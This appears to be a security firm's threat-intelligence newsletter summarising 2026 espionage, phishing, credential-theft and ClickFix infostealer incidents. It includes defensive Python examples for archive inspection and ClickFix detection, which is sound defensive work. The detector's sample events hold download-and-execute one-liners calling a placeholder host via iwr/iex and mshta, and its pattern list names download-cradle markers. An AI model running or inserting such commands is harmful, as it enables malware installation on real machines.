
Global Cyber-Espionage Campaign by State-Backed Asian Threat Group Targets Government and Critical Infrastructure Networks

A recently identified cyber-espionage threat group, known as TGR-STA-1030, has been conducting a widespread global hacking campaign targeting government institutions and critical infrastructure organisations. Security researchers from Palo Alto Networks’ Unit 42 discovered that the group infiltrated the networks of at least 70 organisations across 37 countries during the past year. The operation appears to be aligned with the interests of a nation-state in Asia and primarily focuses on intelligence gathering rather than financial gain. 

Stephen Green

Threat Intelligence Lead | Cyber Risk

sgreen@thomasmurray.com

Valentina Martinez

Cyber Security Analyst | Cyber Risk

vmartinez@thomasmurray.com

TGR-STA-1030 is classified as a state-backed cyber espionage actor, meaning its activities likely support strategic or geopolitical objectives of a government rather than criminal profit. Researchers believe the group has been active since at least January 2024 and has expanded its operations significantly over time. Investigators found several indicators suggesting links to an Asian state actor. These include the attackers’ working hours aligning with Asian time zones, the use of infrastructure and services located in that region, and linguistic traces in the attackers’ tools and online activity.

The cyber-espionage campaign has affected a wide range of organisations globally. Victims include government ministries, law enforcement agencies, border control departments, and critical infrastructure entities such as those involved in energy, trade, and natural resources. Targets span 37 different countries, showing the broad international scope of the operation. In addition to the confirmed breaches, the attackers were observed conducting reconnaissance against government infrastructure in up to 155 countries during late 2025, suggesting the campaign could expand even further.

Several high-profile government entities were reportedly compromised, including ministries responsible for financial management and national administrative functions. These targets indicate the attackers are particularly interested in collecting political, economic, and diplomatic intelligence.

To infiltrate victim networks, the attackers relied on a combination of phishing campaigns and exploitation of known software vulnerabilities, often referred to as “N-day” vulnerabilities. These are flaws that have already been publicly disclosed, and for which a vendor fix typically already exists, but that remain unpatched in many deployed systems; the name refers to the number of days that have passed since disclosure.

The group attempted to exploit vulnerabilities in widely used enterprise software and platforms, including products from major vendors such as Microsoft, SAP, Atlassian, Commvault, and other network or email management systems. By targeting these commonly deployed technologies, the attackers increased their chances of gaining entry into organisational environments.

Notably, researchers found no evidence that the group used zero-day vulnerabilities, meaning they relied primarily on existing, publicly known weaknesses, rather than undisclosed software flaws.

After gaining access to victim networks, the attackers deployed a variety of tools to maintain control and move laterally through systems. In some cases, the group also leveraged advanced malware capabilities, including rootkits designed to maintain persistent access and evade detection. Such tools allow attackers to remain hidden within a network for extended periods while collecting intelligence.

The primary objective of the campaign appears to be long-term cyber espionage rather than immediate disruption or financial theft. By infiltrating government agencies and critical infrastructure organisations, the attackers can gather sensitive information related to policy decisions, diplomatic relations, economic strategies, and national security activities. The attackers carefully conduct reconnaissance, escalate privileges, and move laterally within compromised environments to identify valuable systems and data. Their operations show a methodical approach typical of advanced persistent threat (APT) groups - focusing on stealth, persistence, and intelligence collection rather than quick attacks.

The discovery of TGR-STA-1030 highlights the continuing evolution of nation-state cyber espionage campaigns. The scale of the operation, with at least 70 organisations compromised across 37 countries, demonstrates how cyber operations have become a major tool for geopolitical intelligence gathering. The campaign also underscores a persistent cybersecurity challenge: many organisations remain exposed to attacks exploiting known software vulnerabilities for which patches are already available but have not been applied. Even without zero-day exploits, sophisticated threat actors can successfully compromise high-value targets by combining phishing with exploitation of widely used enterprise software.

https://thehackernews.com/2026/02/asian-state-backed-group-tgr-sta-1030.html


UAC-0050 Spear-Phishing Campaign Targets European Financial Institution with Remote Access Malware

A cyber campaign attributed to UAC-0050, also known as the DaVinci Group, targeted a European financial institution through a social-engineering attack designed to gain remote access to internal systems. The activity suggests the group may be expanding its operations beyond Ukrainian targets to organisations supporting Ukraine’s reconstruction and regional development.

The attack began with a spear-phishing email that impersonated a Ukrainian judicial domain. The message contained a link directing the victim to download a malicious archive hosted on the file-sharing service PixelDrain. Hosting the payload on a legitimate, widely used service lets the download link pass reputation-based controls that would block a newly registered attacker-owned domain.

The downloaded file triggered a multi-stage infection chain involving several nested archives (ZIP, RAR, and a password-protected 7-Zip file). Nesting and password protection both serve the same purpose: a mail gateway or endpoint scanner cannot inspect the contents of an encrypted archive without the password. Inside the final archive was an executable disguised as a PDF using a double extension (.pdf.exe), a common tactic used to trick users into launching malware; with Windows Explorer's default setting of hiding known file extensions, such a file is displayed as a plain .pdf.

When executed, the payload installed Remote Manipulator System (RMS), legitimate remote-desktop software that enables attackers to remotely control the compromised machine, transfer files, and maintain persistent access. Using legitimate tools allows attackers to blend malicious activity with normal system behaviour: because the binary is commercial remote-administration software rather than custom malware, signature-based controls are less likely to flag it, and detection has to rely on context, such as who installed it, whether the organisation sanctions its use, and where it connects to.
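The inspection a mail gateway or analyst would want to run on a chain like the one above, as an added example rather than code from the page or the researchers: it opens nested ZIP containers, reports encrypted members it cannot inspect, and flags a member either by its deceptive double extension or by finding a Windows PE (“MZ”) header behind a document name. It assumes ZIP containers only; the RAR and password-protected 7-Zip layers described in the campaign would need rarfile/py7zr and the password, so those cases are reported rather than opened. The sample archive is constructed inline and is not the campaign's artefact.

```python
"""Inspect a nested archive chain for an executable disguised as a document.

Added example (not code from the page or from the researchers). It assumes
ZIP containers only; the RAR and password-protected 7-Zip layers in the
described chain would need rarfile/py7zr and the password, so those cases
are reported rather than opened.
"""
import io
import os
import zipfile

DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs", ".dll"}
MAX_DEPTH = 5  # nesting deeper than this is itself worth reporting


def looks_like_pe(data: bytes) -> bool:
    """Windows executables start with the 'MZ' DOS header; trust bytes, not names."""
    return data[:2] == b"MZ"


def deceptive_double_extension(name: str) -> bool:
    """True for names such as contract.pdf.exe: the visible 'document' extension
    hides an executable one (Explorer shows 'contract.pdf' when known extensions are hidden)."""
    base = os.path.basename(name).lower()
    root, last = os.path.splitext(base)
    _, inner = os.path.splitext(root)
    return last in EXECUTABLE_EXTS and inner in DOCUMENT_EXTS


def inspect_archive(data: bytes, depth: int = 0, path: str = "") -> list:
    """Recursively open ZIP members and return a list of human-readable findings."""
    findings = []
    if depth > MAX_DEPTH:
        return [f"{path}: nested deeper than {MAX_DEPTH} levels"]
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return [f"{path or '<input>'}: not a ZIP (RAR/7z need rarfile or py7zr)"]
    for info in zf.infolist():
        member = f"{path}/{info.filename}" if path else info.filename
        if info.flag_bits & 0x1:  # bit 0 of the general-purpose flags = encrypted
            findings.append(f"{member}: password-protected; contents not inspectable")
            continue
        content = zf.read(info)
        ext = os.path.splitext(info.filename.lower())[1]
        if ext == ".zip":
            findings.extend(inspect_archive(content, depth + 1, member))
            continue
        if deceptive_double_extension(info.filename):
            findings.append(f"{member}: double extension disguises an executable")
        if looks_like_pe(content) and ext not in EXECUTABLE_EXTS:
            findings.append(f"{member}: PE (MZ) content under a non-executable name")
    return findings


def build_sample_chain() -> bytes:
    """Constructed sample, not the campaign's artefact:
    outer.zip -> court_documents.zip -> contract.pdf.exe (+ a harmless readme)."""
    fake_pe = b"MZ" + b"\x90" * 62  # DOS magic only; enough for the header check
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("contract.pdf.exe", fake_pe)
        z.writestr("readme.txt", b"please open the attached contract")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("court_documents.zip", inner.getvalue())
    return outer.getvalue()


if __name__ == "__main__":
    for finding in inspect_archive(build_sample_chain()):
        print(finding)
```

The two checks are deliberately independent: the name check catches the social-engineering trick even when the payload is a script rather than a PE, and the header check catches a PE renamed to a single document extension that the name check would miss. An encrypted inner archive, as in this campaign, is reported as uninspectable rather than silently skipped; that finding alone is a reasonable reason to quarantine an inbound attachment.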

According to researchers, the targeted victim was a senior legal and policy advisor involved in procurement, a role that likely has access to sensitive financial and operational information. Analysts believe the campaign may aim to support intelligence gathering or financial theft related to institutions involved in Ukraine-related initiatives.

In short, the operation demonstrates how UAC-0050 continues to rely on social engineering and legitimate remote-administration tools to compromise high-value targets and maintain stealthy access to sensitive institutional data.

https://thehackernews.com/2026/02/uac-0050-targets-european-financial.html


Stolen Credentials Used to Access France’s National Bank Account Database, Exposing 1.2 Million Records

A cyber incident in France exposed sensitive data from the country’s national bank account registry, known as FICOBA (French National Bank Account Registry), after an attacker gained unauthorised access using stolen credentials belonging to a government official. The breach was disclosed by the French Ministry of Economy and Finance and occurred in January 2026.

The attacker used the compromised credentials to access the database, which contains records of all bank accounts opened at French financial institutions and is used by government agencies for tax enforcement, fraud investigations, and judicial processes. Through this access, the attacker was able to view information linked to approximately 1.2 million bank accounts.

The compromised data included bank account numbers, account holder names, addresses, and - in some cases - tax identification numbers. However, authorities emphasised that the database does not contain account balances or transaction capabilities, meaning the attacker could not directly access funds or perform banking operations.

Once the breach was discovered, the unauthorised access was immediately terminated and authorities began responding to the incident. Affected individuals are being notified, and banks have been advised to warn customers about potential phishing attempts or scams that could result from the exposed data. The French government has also launched an investigation and informed the national data protection authority.

Although the identity of the attacker remains unknown, the incident highlights the risks posed by credential compromise: a single set of valid credentials was sufficient to read a centralised financial database holding large volumes of sensitive personal information. Controls that limit what a stolen password alone can achieve, such as multi-factor authentication, per-query access limits, and alerting on unusually large read volumes, are what bound the damage in this kind of incident.

https://www.theregister.com/2026/02/22/french_bank_hack/


ClickFix Malware Campaign Steals Data from Crypto Wallets and Dozens of Web Browsers

Researchers have identified a new malware campaign using the ClickFix social engineering technique to infect users with an infostealer capable of targeting cryptocurrency wallets and more than 25 web browsers. The attack relies on deceptive web pages that trick victims into executing malicious commands, ultimately installing malware that steals sensitive data.

The campaign typically begins when a user visits a compromised or malicious website and is presented with a fake verification page, often designed to resemble a security check such as a CAPTCHA. The page instructs the user to perform steps to “fix” an issue, usually by copying a command that the page has placed on the clipboard and pasting it into a system prompt such as the Windows Run dialog or a terminal. If the user follows these instructions, the command downloads and executes malware on the device.

Once installed, the infostealer collects a wide range of information from the infected system. This includes credentials stored in web browsers, cryptocurrency wallet data, cookies, and other sensitive information that can be used for account takeover or financial theft. The malware specifically targets data from over 25 different browsers, increasing the chances of extracting valuable credentials and digital assets.

Researchers note that the attack demonstrates how cybercriminals are increasingly relying on social engineering rather than sophisticated exploits. Because the victim launches the command themselves, there is no exploit for a browser sandbox to contain and no attachment for a mail gateway to scan; the initial execution appears as a user-initiated process, which lets attackers bypass many traditional security controls and deploy information-stealing malware more easily.
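The detection logic that follows from the above is an added example, not code from the page or the researchers: the one observable the ClickFix chain cannot avoid is an interpreter launched from the user's shell with a download-and-execute one-liner on its command line. The script scores Sysmon-style process-creation events (parent image, image, command line) and flags those with an explorer.exe parent plus download-cradle markers. The events are constructed samples, not real telemetry, and the markers are heuristics chosen for this example, not a published signature set.

```python
"""Heuristic ClickFix detection over process-creation telemetry.

Added example (not code from the page or the researchers). It assumes
Sysmon-style process-creation events with parent image, image and command
line, and flags the pattern ClickFix relies on: a user-launched interpreter
(explorer.exe parent, i.e. Run dialog or Start menu) running a
download-and-execute one-liner.
"""
import re

INTERACTIVE_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                     "wscript.exe", "cscript.exe"}

# Download-and-execute "cradle" markers commonly seen in pasted ClickFix commands.
CRADLE_PATTERNS = [
    re.compile(r"\biex\b|invoke-expression", re.I),                   # execute fetched text
    re.compile(r"\biwr\b|invoke-webrequest|downloadstring|downloadfile|\bcurl\s|\bwget\s", re.I),
    re.compile(r"-w(indowstyle)?\s+hidden", re.I),                     # hide the console
    re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),  # base64 payload
    re.compile(r"mshta(\.exe)?\s+https?://", re.I),                    # remote HTA
]

# Constructed sample events (simplified Sysmon Event ID 1 fields), not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://example.invalid/verify.txt | iex"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://example.invalid/check.hta"},
    {"parent": r"C:\Program Files\Acme\Deploy\deploy.exe",   # legitimate admin tooling
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: dict) -> int:
    """Suspicion score: 0 for non-interpreters; +1 for an explorer.exe parent
    (Run dialog / Start menu launch); +1 per cradle marker on the command line."""
    if _basename(event["image"]) not in INTERACTIVE_HOSTS:
        return 0
    score = 1 if _basename(event["parent"]) == "explorer.exe" else 0
    score += sum(1 for pat in CRADLE_PATTERNS if pat.search(event["cmdline"]))
    return score


def flag_clickfix(events: list, threshold: int = 2) -> list:
    """Events scoring at or above the threshold. A plain PowerShell launch from
    the Start menu scores 1 and is not flagged; it needs a cradle marker too."""
    return [ev for ev in events if score_event(ev) >= threshold]


if __name__ == "__main__":
    for ev in flag_clickfix(SAMPLE_EVENTS):
        print(f"score={score_event(ev)} {ev['cmdline']}")
```

The threshold keeps ordinary administrator use (an orchestration tool running a signed script) out of the alert queue while still catching the mshta variant, which carries only one marker but a user-shell parent. On Windows, the same paste step usually leaves a second artefact worth correlating: commands typed into the Run dialog are recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, so a cradle string in that key corroborates a flagged event.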

https://hackread.com/clickfix-attack-crypto-wallets-browsers-infostealer/


Google Disrupts Global Chinese Cyber-Espionage Network Targeting Governments and Telecom Providers

Researchers at Google announced that they disrupted a large cyber-espionage campaign linked to China that had targeted government organisations and telecommunications providers across dozens of countries. The operation was attributed to a threat cluster tracked as UNC2814, which has reportedly been active since at least 2017.

According to Google’s threat intelligence team, the campaign affected at least 53 organisations in 42 countries, including entities in Africa, Asia, and the Americas. The attackers primarily targeted telecommunications companies and government institutions, sectors that can provide valuable intelligence about communications networks and individuals of interest.

The threat actors used various online services to manage their operations and support data collection. Investigators found that the group leveraged Google services such as Google Sheets and other cloud infrastructure to help manage targeting information and coordinate their espionage activities.

After discovering the campaign, Google worked with partners to disable the attackers’ infrastructure, including shutting down cloud projects and accounts linked to the operation. The company also blocked systems the group used to conduct surveillance and collect stolen information.

Security analysts described the campaign as part of a broader effort by China-linked actors to conduct long-term intelligence gathering, particularly through telecommunications networks that can reveal communications patterns and information about targeted individuals or organisations.

https://therecord.media/china-cyber-espionage-google-disrupt

Managing Risk of AI Adoption


AI is transforming how organisations across the globe work, from powering internal knowledge hubs and embedding tools like Copilot in Teams, to generating production-ready code. But every innovation brings new cyber risks, compliance challenges, and attack surfaces. By utilising our AI code testing service, you can ensure your AI deployments are resilient, compliant, and ready for the real world.
